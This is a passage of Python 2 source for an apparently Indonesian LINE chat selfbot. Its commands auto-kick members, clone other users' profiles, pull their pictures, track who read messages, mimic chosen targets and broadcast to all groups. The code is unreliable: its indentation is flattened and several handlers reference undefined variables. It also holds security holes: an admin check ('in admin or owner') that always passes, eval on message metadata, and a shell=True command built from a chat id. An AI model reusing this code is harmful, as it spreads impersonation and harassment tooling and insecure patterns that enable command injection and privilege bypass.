if wait["lang"] == "JP":
cl.sendText(msg.to,"noтιғ joιn on")
else:
wait["Wc"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
elif msg.text in ["Njoin off"]:
if wait["Wc"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"noтιғ joιn oғғ")
else:
wait["Wc"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already oғғ")
#--------------------------
elif msg.text in ["Nleave on"]:
if wait["Lv"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"noтιғ leave on")
else:
wait["Lv"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
elif msg.text in ["Nleave off"]:
if wait["Lv"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"noтιғ leave oғғ")
else:
wait["Lv"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already oғғ")
##--------------------------
elif msg.text in ["Kick On"]:
if msg.from_ in admin or owner:
if wait["autoKick"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick on")
else:
wait["autoKick"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
elif msg.text in ["Kick Off"]:
if msg.from_ in admin or owner:
if wait["autoKick"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick oғғ")
else:
wait["autoKick"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already oғғ") #----------------------------------------------------------------
elif 'music ' in msg.text.lower():
try:
songname = msg.text.lower().replace('music ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[4])
except Exception as njer:
cl.sendText(msg.to, str(njer))
#------------------------------------------------
elif 'lirik ' in msg.text.lower():
try:
songname = msg.text.lower().replace('lirik ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
#-----------------------------------
elif "idline " in msg.text:
id = msg.text.replace("idline ", "")
find = cl.findContactsByUserId(id)
for findid in find:
try:
msg.contentType = 13
msg.contentMetadata = {'mid': findid.mid}
cl.sendMessage(msg)
except Exception as error:
print error
#-----------------------------------
elif "Getgroup" in msg.text:
group = cl.getGroup(msg.to)
path =("http://dl.profile.line-cdn.net/" + group.pictureStatus)
cl.sendImageWithURL(msg.to, path)
#----------------------------------
elif "reinvite" in msg.text.split():
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
try:
grCans = [contact.mid for contact in group.invitee]
cl.findAndAddContactByMid(msg.to, grCans)
cl.cancelGroupInvitation(msg.to, grCans)
cl.inviteIntoGroup(msg.to, grCans)
except Exception as error:
print error
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No Invited")
else:
cl.sendText(msg.to,"Error")
else:
pass
#----------------------------------
elif "Leavegroup " in msg.text.split():
if msg.from_ in admin or owner:
ng = msg.text.split().replace("Leavegroup ","")
gid = cl.getGroupIdsJoined()
if msg.from_ in admin or owner:
for i in gid:
h = cl.getGroup(i).name
if h == ng:
cl.sendText(i,"Bot di paksa keluar oleh owner!")
cl.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
cl.sendText(msg.to,"Success left ["+ h +"] group")
#else:
#pass
#else:
#cl.sendText(msg.to,"Khusus Creator/Admin")
elif msg.text in ["LG"]: #Melihat List Group
if msg.from_ in admin or owner:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = cl.getGroup(i).name
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["LG2"]: #Melihat List Group + ID Groupnya (Gunanya Untuk Perintah InviteMeTo:)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#--------------List Group------------
elif "Asupka: " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("Asupka: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#----------------------------------
elif "Getcontact " in msg.text:
if msg.from_ in admin or owner:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
#----------------------------------
elif "youtube " in msg.text.lower():
query = msg.text.lower().replace("youtube ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&List' not in a['href']:
cl.sendText(msg.to,'Judul : ' + a['title'] + '\nLink : ' + 'http://www.youtube.com' + a['href'])
#---------------------------------
#-----------------------------------------
elif msg.text.lower() == 'runtime':
eltime = time.time() - mulai
van = "Bot sudah berjalan selama "+waktu(eltime)
cl.sendText(msg.to,van)
#-----------------------------------------
elif msg.text in ["Restart"]:
if msg.from_ in owner:
cl.sendText(msg.to, "Bot has been restarted")
restart_program()
print "@Restart"
#-----------------------------------------
elif "Copy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin or owner:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
cl.sendText(msg.to, "Succes Copy profile")
except Exception as e:
print e
#-----------------------------------------
elif "Getinfo @" in msg.text:
nama = msg.text.replace("Getinfo @","")
target = nama.rstrip(' ')
van = cl.getGroup(msg.to)
for linedev in van.members:
if target == linedev.displayName:
mid = cl.getContact(linedev.mid)
#./linedev/ervan
try:
cover = cl.channel.getCover(linedev.mid)
except:
cover = ""
cl.sendText(msg.to,"[Display Name]:\n" + mid.displayName + "\n[Mid]:\n" + linedev.mid + "\n[BIO]:\n" + mid.statusMessage + "\n[Ava]:\nhttp://dl.profile.line-cdn.net/" + mid.pictureStatus + "\n[Cover]:\n" + str(cover))
else:
pass
elif "Getinfo2 " in msg.text:
mid = msg.text.replace("Getinfo2 ","")
anu = cl.getContact(mid)
try:
cover = cl.channel.getCover(mid)
except:
cover = ""
cl.sendText(msg.to,"[Display Name]:\n" + anu.displayName + "\n[Mid]:\n" + mid + "\n[BIO]:\n" + anu.statusMessage + "\n[Ava]:\nhttp://dl.profile.line-cdn.net/" + anu.pictureStatus + "\n[Cover]:\n" + str(cover))
#-----------------------------------------
elif msg.text in ["Gcreator"]:
if msg.toType == 2:
msg.contentType = 13
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
msg.contentMetadata = {'mid': gCreator}
gCreator1 = ginfo.creator.displayName
except:
gCreator = "Error"
cl.sendText(msg.to, "Group Creator : " + gCreator1)
cl.sendMessage(msg)
#-----------------------------------------------
elif msg.text in ["Tag on"]:
if wait["tag"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Tag On")
else:
wait["tag"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag On")
else:
cl.sendText(msg.to,"already on")
elif msg.text in ["Tag off"]:
if wait["tag"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off")
else:
cl.sendText(msg.to,"Tag Off")
else:
wait["tag"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag Off")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Tag2 on"]:
if msg.from_ in admin or owner:
if wait["tag2"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Tag On")
else:
wait["tag2"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag On")
else:
cl.sendText(msg.to,"already on")
elif msg.text in ["Tag2 off"]:
if msg.from_ in admin or owner:
if wait["tag2"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off")
else:
cl.sendText(msg.to,"Tag Off")
else:
wait["tag2"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag Off")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Auto on"]:
if msg.from_ in admin or owner:
if wait["auto"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Bot join on")
else:
cl.sendText(msg.to,"Bot join On")
else:
wait["auto"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Bot join On")
else:
cl.sendText(msg.to,"Bot join On")
elif msg.text in ["Auto off"]:
if msg.from_ in admin or owner:
if wait["auto"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Bot join off")
else:
cl.sendText(msg.to,"Bot join off")
else:
wait["auto"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Bot join off")
else:
cl.sendText(msg.to,"Bot join off")
#-----------------------------------------------
elif "Admadd @" in msg.text:
if msg.from_ in admin or owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admadd @","")
_nametarget = _name.rstrip(' ')
                gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Admin Telah Ditambahkan")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command Di Tolak Jangan Sedih")
cl.sendText(msg.to,"Sudah Menjadi Admin Maka Tidak Bisa Menjadi Admin Lagi")
elif "Admrem @" in msg.text:
if msg.from_ in admin or owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Admrem @","")
_nametarget = _name.rstrip(' ')
                gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Admin Telah Dihapus")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command DiTolak")
cl.sendText(msg.to,"Admin Tidak Bisa Menggunakan")
elif msg.text in ["Adminlist",".alist"]:
if msg.from_ in admin or owner:
if admin == []:
cl.sendText(msg.to,"The adminlist is empty")
else:
cl.sendText(msg.to,"Sabar Dikit Mamang.....")
mc = ""
for mi_d in admin:
mc += "☄1�7 " +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#-----------------------------------------------
elif "Setimage " in msg.text:
wait["Pap"] = msg.text.replace("Setimage ","")
cl.sendText(msg.to,"Image Has Ben Set To")
elif msg.text in ["Papimage","/Papim"]:
cl.sendImageWithURL(msg.to,wait["Pap"])
elif "Setvideo " in msg.text:
wait["Vid"] = msg.text.replace("Setvideo ","")
cl.sendText(msg.to,"Video Has Ben Set To")
elif msg.text in ["Papvideo","/Papvid"]:
cl.sendVideoWithURL(msg.to,wait["Vid"])
#-----------------------------------------------
#-----------------------------------------------
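        # Ban a mentioned user: the target mid is stored in wait["blacklist"] and written out to st2__b.json.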
elif ("Ban " in msg.text):
if msg.from_ in admin or owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned")
except:
pass
#-----------------------------------------------
elif "Kapan " in msg.text:
tanya = msg.text.replace("Kapan ","")
jawab = ("Besok","Tahun Depan","Minggu Depan","Satu Abad")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
#-----------------------------------------------
elif "Mycopy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin or owner:
print "[COPY] Ok"
_name = msg.text.replace("Mycopy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
                                cl.cloneContactProfile(target)
cl.sendText(msg.to, "Succes Copy profile")
except Exception as e:
print e
elif msg.text in ["Mybackup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "backup done")
except Exception as e:
cl.sendText(msg.to, str (e))
#--------------------------------------
elif msg.text in ["Time"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
            bln = bulan[int(bln) - 1]  # '%m' yields "01".."12"
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
cl.sendText(msg.to, rst)
#client.sendText(msg.to, rst)
#-----------------------------------------------
elif "image " in msg.text:
search = msg.text.replace("image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithURL(msg.to,path)
except:
pass
#-----------------------------------------------
elif 'ig ' in msg.text.lower():
try:
instagram = msg.text.lower().replace("ig ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "========INSTAGRAM INFO USER========\n"
details = "\n========INSTAGRAM INFO USER========"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
#-----------------------------------------------
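        # Translate commands: "Tr-<code> <text>" runs <text> through the translate() helper for the given target language.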
elif "Tr-id " in msg.text:
nk0 = msg.text.replace("Tr-id ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'id')
cl.sendText(msg.to,str(trans))
elif "Tr-th " in msg.text:
nk0 = msg.text.replace("Tr-th ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'th')
cl.sendText(msg.to,str(trans))
elif "Tr-ja " in msg.text:
nk0 = msg.text.replace("Tr-ja ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'ja')
cl.sendText(msg.to,str(trans))
elif "Tr-en " in msg.text:
nk0 = msg.text.replace("Tr-en ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'en')
cl.sendText(msg.to,str(trans))
elif "Tr-ms " in msg.text:
nk0 = msg.text.replace("Tr-ms ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'ms')
cl.sendText(msg.to,str(trans))
elif "Tr-it " in msg.text:
nk0 = msg.text.replace("Tr-it ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'it')
cl.sendText(msg.to,str(trans))
elif "Tr-tr " in msg.text:
nk0 = msg.text.replace("Tr-tr ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'tr')
cl.sendText(msg.to,str(trans))
elif "Tr-my " in msg.text:
nk0 = msg.text.replace("Tr-my ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'my')
cl.sendText(msg.to,str(trans))
elif "Tr-af " in msg.text:
nk0 = msg.text.replace("Tr-af ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'af')
cl.sendText(msg.to,str(trans))
elif "Tr-sq " in msg.text:
nk0 = msg.text.replace("Tr-sq ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'sq')
cl.sendText(msg.to,str(trans))
elif "Tr-am " in msg.text:
nk0 = msg.text.replace("Tr-am ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'am')
cl.sendText(msg.to,str(trans))
elif "Tr-ar " in msg.text:
nk0 = msg.text.replace("Tr-ar ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'ar')
cl.sendText(msg.to,str(trans))
elif "Tr-hy " in msg.text:
nk0 = msg.text.replace("Tr-hy ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'hy')
cl.sendText(msg.to,str(trans))
#----------------UpdateFotoProfil----------------#
elif "Cpp" in msg.text:
if msg.from_ in admin or owner:
path = "syn.jpg"
cl.sendText(msg.to,"Update PP :")
cl.sendImage(msg.to,path)
cl.updateProfilePicture(path)
#----------------------------------------
#----------------------------------------------------------------------------
elif "Steal @" in msg.text:
if msg.from_ in admin or owner:
_name = msg.text.replace("Steal @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except:
pass
#-----------------------------------------------
elif "Steal " in msg.text:
if msg.from_ in admin or owner:
salsa = msg.text.replace("Steal ","")
Manis = cl.getContact(salsa)
Imoet = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
                    cover = cl.channel.getCover(salsa)
except:
cover = ""
cl.sendText(msg.to,"Gambar Foto Profilenya")
cl.sendImageWithURL(msg.to,Imoet)
if cover == "":
cl.sendText(msg.to,"User tidak memiliki cover atau sejenisnya")
else:
cl.sendText(msg.to,"Gambar Covernya")
cl.sendImageWithURL(msg.to,cover)
#--------------------------CEK SIDER------------------------------
elif "setview" in msg.text:
subprocess.Popen("echo '' > dataSeen/"+msg.to+".txt", shell=True, stdout=subprocess.PIPE)
cl.sendText(msg.to, "Checkpoint checked!")
print "@setview"
elif "viewseen" in msg.text:
lurkGroup = ""
dataResult, timeSeen, contacts, userList, timelist, recheckData = [], [], [], [], [], []
with open('dataSeen/'+msg.to+'.txt','r') as rr:
contactArr = rr.readlines()
for v in xrange(len(contactArr) -1,0,-1):
num = re.sub(r'\n', "", contactArr[v])
contacts.append(num)
pass
contacts = list(set(contacts))
for z in range(len(contacts)):
arg = contacts[z].split('|')
userList.append(arg[0])
timelist.append(arg[1])
uL = list(set(userList))
for ll in range(len(uL)):
try:
getIndexUser = userList.index(uL[ll])
timeSeen.append(time.strftime("%H:%M:%S", time.localtime(int(timelist[getIndexUser]) / 1000)))
recheckData.append(userList[getIndexUser])
except IndexError:
                    pass
contactId = cl.getContacts(recheckData)
for v in range(len(recheckData)):
dataResult.append(contactId[v].displayName + ' ('+timeSeen[v]+')')
pass
if len(dataResult) > 0:
tukang = "List Viewer\n*"
grp = '\n* '.join(str(f) for f in dataResult)
total = '\n\nTotal %i viewers (%s)' % (len(dataResult), datetime.now().strftime('%H:%M:%S') )
cl.sendText(msg.to, "%s %s %s" % (tukang, grp, total))
else:
cl.sendText(msg.to, "Belum ada viewers")
print "@viewseen"
#--------------------------CEK SIDER------------------------------
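        # Mimic mode: messages from users in mimic["target"] are echoed back to the chat (text and contact cards; stickers are answered with a fixed sticker).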
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
cl.sendMessage(msg)
elif "Mimic:" in msg.text:
cmd = msg.text.replace("Mimic:","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Mimic on")
else:
cl.sendText(msg.to,"Mimic already on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Mimic off")
else:
cl.sendText(msg.to,"Mimic already off")
elif "Add:" in cmd:
target0 = msg.text.replace("Add:","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets")
else:
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Success added target")
#cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"Failed")
break
elif "Del:" in cmd:
target0 = msg.text.replace("Del:","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets")
else:
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Success deleted target")
#cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"Failed!")
break
elif cmd == "ListTarget":
if mimic["target"] == {}:
cl.sendText(msg.to,"No target")
else:
lst = "<<Lit Target>>"
total = len(mimic["target"])
for a in mimic["target"]:
if mimic["target"][a] == True:
stat = "On"
else:
stat = "Off"
lst += "\n☄1�7" + cl.getContact(mi_d).displayName + " | " + stat
cl.sendText(msg.to,lst + "\nTotal:" + total)
#----------------------------------------------------------------
#--------------------------------
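        # Gift commands: send LINE present messages (contentType 9) whose PRDID metadata points at a theme product.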
elif msg.text in ["Gift","gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Gift1"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '696d7046-843b-4ed0-8aac-3113ed6c0733',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Gift2"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '8fe8cdab-96f3-4f84-95f1-6d731f0e273e',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Gift3"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'ae3d9165-fab2-4e70-859b-c14a9d4137c4',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
cl.sendMessage(msg)
#------------------------------
#--------------------------------------
elif msg.text in ["hmm"]:
cl.sendText(msg.to,"Waduh kenapa gatel tenggorokan ya")
elif msg.text in ["welcome","Kam"]:
cl.sendText(msg.to,"Selamat datang di Group")
cl.sendText(msg.to,"Jangan nakal ok!")
#-----------------------------------------------
#-------------- Add Friends ------------
elif "botadd @" in msg.text:
if msg.from_ in admin or owner:
if msg.toType == 2:
if msg.from_ in admin or owner:
print "[Command]Add executing"
_name = msg.text.replace("botadd @","")
_nametarget = _name.rstrip(' ')
                        gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
ki.findAndAddContactsByMid(target)
kk.findAndAddContactsByMid(target)
kc.findAndAddContactsByMid(target)
                                    cl.sendText(msg.to, "Friend added successfully")
except:
cl.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Perintah Ditolak")
cl.sendText(msg.to,"Perintah ini Hanya Untuk Admin")
#-----------------------------------------------
elif msg.text in ["Respon"]:
if msg.from_ in admin or owner:
cl.sendText(msg.to,"Bot 1")
cl.sendText(msg.to,"Bot 2")
cl.sendText(msg.to,"Bot 3")
elif msg.text in ["Absen"]:
cl.sendText(msg.to,"👉★★★")
cl.sendText(msg.to,"👉★★★★")
cl.sendText(msg.to,"👉★★★★★")
cl.sendText(msg.to,"👉★★★★★★")
cl.sendText(msg.to,"👉★★★★★★★")
cl.sendText(msg.to,"👉Semua Hadir Boss...!!!\n\n[✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰]")
#-------------------------------------------------
elif "Getmid @" in msg.text:
if msg.from_ in admin or owner:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#--------------------------
elif msg.text in ["Bot kemari"]: # Keluar Dari Semua Group Yang Di dalem nya ada bot(Kalo Bot Kalian Nyangkut di Group lain :D)
if msg.from_ in admin or owner:
gid = cl.getGroupIdsJoined()
                for i in gid:
                    ginfo = cl.getGroup(i)
                    cl.leaveGroup(i)
                    ki.leaveGroup(i)
                    if wait["lang"] == "JP":
                        cl.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nBots forced to leave by the bot owner!\nThanks!")
else:
cl.sendText(msg.to,"He declined all invitations")
#--------------------------
elif "Bcast " in msg.text:
if msg.from_ in admin or owner:
bc = msg.text.replace("Bcast ","")
gid = cl.getGroupIdsJoined()
for i in gid:
cl.sendText(i,"======[BROADCAST]======\n\n"+bc+"\n\n#BROADCAST!!")
#--------------------------------------------------------
elif msg.text in ["Sp","Speed",".sp"]:
if msg.from_ in admin or owner:
start = time.time()
cl.sendText(msg.to, "Lagi Proses...")
cl.sendText(msg.to, "Santai...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%s/Detik" % (elapsed_time))
#------------------------------------------------------------------
elif msg.text in ["Clearban"]:
if msg.from_ in admin or owner:
wait["blacklist"] = {}
cl.sendText(msg.to,"clear")
elif msg.text in ["Ban"]:
if msg.from_ in admin or owner:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim Kontak")
elif msg.text in ["Unban"]:
if msg.from_ in admin or owner:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim Kontak")
elif msg.text in ["Banlist"]:
if msg.from_ in admin or owner:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada")
else:
cl.sendText(msg.to,"Tunggu Sebentar Memuat Data")
mc = ""
for mi_d in wait["blacklist"]:
mc += "☄1�7 " +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Cek ban"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text in ["Kill ban"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
cl.kickoutFromGroup(msg.to,[jj])
cl.sendText(msg.to,"Bye...")
elif "Cancel" in msg.text:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
elif "/Random:" in msg.text:
if msg.from_ in admin or owner:
if msg.toType == 2:
strnum = msg.text.replace("/Random:","")
